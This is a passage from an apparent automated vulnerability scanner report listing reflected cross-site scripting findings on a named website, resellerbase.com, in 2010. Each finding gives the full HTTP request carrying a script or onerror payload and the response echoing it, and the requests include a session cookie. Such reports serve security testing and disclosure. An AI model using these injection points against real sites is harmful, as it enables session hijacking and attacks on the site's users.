User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating/4half.gif4f42d<img src=a onerror=alert(1)>de1d55e530e]</td>
...[SNIP]...

2.4506. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload d105a</title><img%20src%3da%20onerror%3dalert(1)>33a53ce2e62 was submitted in the REST URL parameter 6. This input was echoed as d105a</title><img src=a onerror=alert(1)>33a53ce2e62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/4half.gifd105a</title><img%20src%3da%20onerror%3dalert(1)>33a53ce2e62 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating/4half.gifd105a</title><img src=a onerror=alert(1)>33a53ce2e62</title>
...[SNIP]...

2.4507. http://www.resellerbase.com/tag/themes/kosmos/images/rating/5.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9fbe8<script>alert(1)</script>6fc2b4fe6a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag9fbe8<script>alert(1)</script>6fc2b4fe6a2/themes/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag9fbe8<script>alert(1)</script>6fc2b4fe6a2/themes/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.4508. http://www.resellerbase.com/tag/themes/kosmos/images/rating/5.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f6417<img%20src%3da%20onerror%3dalert(1)>4a798fe39ec was submitted in the REST URL parameter 2. This input was echoed as f6417<img src=a onerror=alert(1)>4a798fe39ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themesf6417<img%20src%3da%20onerror%3dalert(1)>4a798fe39ec/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themesf6417<img src=a onerror=alert(1)>4a798fe39ec/kosmos/images/rating/5.gif]</td>
...[SNIP]...

2.4509. http://www.resellerbase.com/tag/themes/kosmos/images/rating/5.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 9ab7c</title><img%20src%3da%20onerror%3dalert(1)>b582bc11412 was submitted in the REST URL parameter 2. This input was echoed as 9ab7c</title><img src=a onerror=alert(1)>b582bc11412 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes9ab7c</title><img%20src%3da%20onerror%3dalert(1)>b582bc11412/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes9ab7c</title><img src=a onerror=alert(1)>b582bc11412/kosmos/images/rating/5.gif</title>
...[SNIP]...

2.4510. http://www.resellerbase.com/tag/themes/kosmos/images/rating/5.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7ba03<img%20src%3da%20onerror%3dalert(1)>f3e942e7dc was submitted in the REST URL parameter 3. This input was echoed as 7ba03<img src=a onerror=alert(1)>f3e942e7dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos7ba03<img%20src%3da%20onerror%3dalert(1)>f3e942e7dc/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos7ba03<img src=a onerror=alert(1)>f3e942e7dc/images/rating/5.gif]</td>
...[SNIP]...

2.4511. http://www.resellerbase.com/tag/themes/kosmos/images/rating/5.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 9ac45</title><img%20src%3da%20onerror%3dalert(1)>8cb31aabc55 was submitted in the REST URL parameter 3. This input was echoed as 9ac45</title><img src=a onerror=alert(1)>8cb31aabc55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos9ac45</title><img%20src%3da%20onerror%3dalert(1)>8cb31aabc55/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos9ac45</title><img src=a onerror=alert(1)>8cb31aabc55/images/rating/5.gif</title>
...[SNIP]...

2.4512. http://www.resellerbase.com/tag/themes/kosmos/images/rating/5.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload 69a80</title><img%20src%3da%20onerror%3dalert(1)>3f43aa62892 was submitted in the REST URL parameter 4. This input was echoed as 69a80</title><img src=a onerror=alert(1)>3f43aa62892 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images69a80</title><img%20src%3da%20onerror%3dalert(1)>3f43aa62892/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images69a80</title><img src=a onerror=alert(1)>3f43aa62892/rating/5.gif</title>
...[SNIP]...

2.4513. http://www.resellerbase.com/tag/themes/kosmos/images/rating/5.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7d542<img%20src%3da%20onerror%3dalert(1)>e0c6ce3928d was submitted in the REST URL parameter 4. This input was echoed as 7d542<img src=a onerror=alert(1)>e0c6ce3928d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images7d542<img%20src%3da%20onerror%3dalert(1)>e0c6ce3928d/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images7d542<img src=a onerror=alert(1)>e0c6ce3928d/rating/5.gif]</td>
...[SNIP]...

2.4514. http://www.resellerbase.com/tag/themes/kosmos/images/rating/5.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8d5ac<img%20src%3da%20onerror%3dalert(1)>af0fff988c was submitted in the REST URL parameter 5. This input was echoed as 8d5ac<img src=a onerror=alert(1)>af0fff988c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating8d5ac<img%20src%3da%20onerror%3dalert(1)>af0fff988c/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating8d5ac<img src=a onerror=alert(1)>af0fff988c/5.gif]</td>
...[SNIP]...

2.4515. http://www.resellerbase.com/tag/themes/kosmos/images/rating/5.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload 8b87a</title><img%20src%3da%20onerror%3dalert(1)>03057eb71c5 was submitted in the REST URL parameter 5. This input was echoed as 8b87a</title><img src=a onerror=alert(1)>03057eb71c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating8b87a</title><img%20src%3da%20onerror%3dalert(1)>03057eb71c5/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating8b87a</title><img src=a onerror=alert(1)>03057eb71c5/5.gif</title>
...[SNIP]...

2.4516. http://www.resellerbase.com/tag/themes/kosmos/images/rating/5.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload 7a72a</title><img%20src%3da%20onerror%3dalert(1)>49f93810925 was submitted in the REST URL parameter 6. This input was echoed as 7a72a</title><img src=a onerror=alert(1)>49f93810925 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/5.gif7a72a</title><img%20src%3da%20onerror%3dalert(1)>49f93810925 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating/5.gif7a72a</title><img src=a onerror=alert(1)>49f93810925</title>
...[SNIP]...

2.4517. http://www.resellerbase.com/tag/themes/kosmos/images/rating/5.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1da2c<img%20src%3da%20onerror%3dalert(1)>43babaab3a7 was submitted in the REST URL parameter 6. This input was echoed as 1da2c<img src=a onerror=alert(1)>43babaab3a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/5.gif1da2c<img%20src%3da%20onerror%3dalert(1)>43babaab3a7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating/5.gif1da2c<img src=a onerror=alert(1)>43babaab3a7]</td>
...[SNIP]...

2.4518. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e5689<script>alert(1)</script>8ac556ababf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tage5689<script>alert(1)</script>8ac556ababf/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tage5689<script>alert(1)</script>8ac556ababf/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4519. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2380e<script>alert(1)</script>6a8d35e746bdffebf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag2380e<script>alert(1)</script>6a8d35e746bdffebf/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:02:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag2380e<script>alert(1)</script>6a8d35e746bdffebf/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4520. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload c37ac</title><img%20src%3da%20onerror%3dalert(1)>063d5072d4b7986bf was submitted in the REST URL parameter 2. This input was echoed as c37ac</title><img src=a onerror=alert(1)>063d5072d4b7986bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themesc37ac</title><img%20src%3da%20onerror%3dalert(1)>063d5072d4b7986bf/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themesc37ac</title><img src=a onerror=alert(1)>063d5072d4b7986bf/kosmos/images/rating/search.php</title>
...[SNIP]...

2.4521. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6dda8<img%20src%3da%20onerror%3dalert(1)>9c4d7d9d967aad295 was submitted in the REST URL parameter 2. This input was echoed as 6dda8<img src=a onerror=alert(1)>9c4d7d9d967aad295 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes6dda8<img%20src%3da%20onerror%3dalert(1)>9c4d7d9d967aad295/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes6dda8<img src=a onerror=alert(1)>9c4d7d9d967aad295/kosmos/images/rating/search.php]</td>
...[SNIP]...

2.4522. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1c692<img%20src%3da%20onerror%3dalert(1)>1c3cfaef56c was submitted in the REST URL parameter 2. This input was echoed as 1c692<img src=a onerror=alert(1)>1c3cfaef56c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

